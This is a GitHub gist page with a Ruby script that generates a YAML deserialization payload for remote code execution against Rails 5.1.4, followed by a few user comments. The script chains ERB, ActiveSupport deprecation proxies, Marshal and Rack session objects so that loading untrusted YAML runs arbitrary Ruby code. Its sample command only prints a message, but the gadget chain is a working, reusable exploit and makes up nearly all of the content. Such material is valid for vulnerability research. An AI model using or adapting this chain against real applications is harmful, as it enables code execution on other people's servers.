Last active
March 7, 2021 12:14
-
-
Save niklasb/df9dba3097df536820888aeb4de3284f to your computer and use it in GitHub Desktop.
Rails 5.1.4 YAML unsafe deserialization RCE payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'yaml' | |
require 'base64' | |
require 'erb' | |
class ActiveSupport | |
class Deprecation | |
def initialize() | |
@silenced = true | |
end | |
class DeprecatedInstanceVariableProxy | |
def initialize(instance, method) | |
@instance = instance | |
@method = method | |
@deprecator = ActiveSupport::Deprecation.new | |
end | |
end | |
end | |
end | |
code = <<-EOS | |
puts "pwned" | |
EOS | |
erb = ERB.allocate | |
erb.instance_variable_set :@src, code | |
erb.instance_variable_set :@lineno, 1337 | |
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result | |
payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "") | |
payload = <<-PAYLOAD | |
--- | |
!ruby/object:Gem::Requirement | |
requirements: | |
!ruby/object:Rack::Session::Abstract::SessionHash | |
req: !ruby/object:Rack::Request | |
env: | |
"rack.session": !ruby/object:Rack::Session::Abstract::SessionHash | |
id: 'hi from espr' | |
HTTP_COOKIE: "a=#{payload}" | |
store: !ruby/object:Rack::Session::Cookie | |
coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {} | |
key: a | |
secrets: [] | |
exists: true | |
loaded: false | |
PAYLOAD | |
puts payload |
@RicterZ If you load untrusted YAML without safe mode you have a security issue regardless of this payload
RicterZ kinda off ; problem start from 2013 but seem new load untrusted YAML , too bad
Sir how to use this payload .I am a beginner
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
A 0-day? I couldn't find any information about this security issue on Rails official website or Github.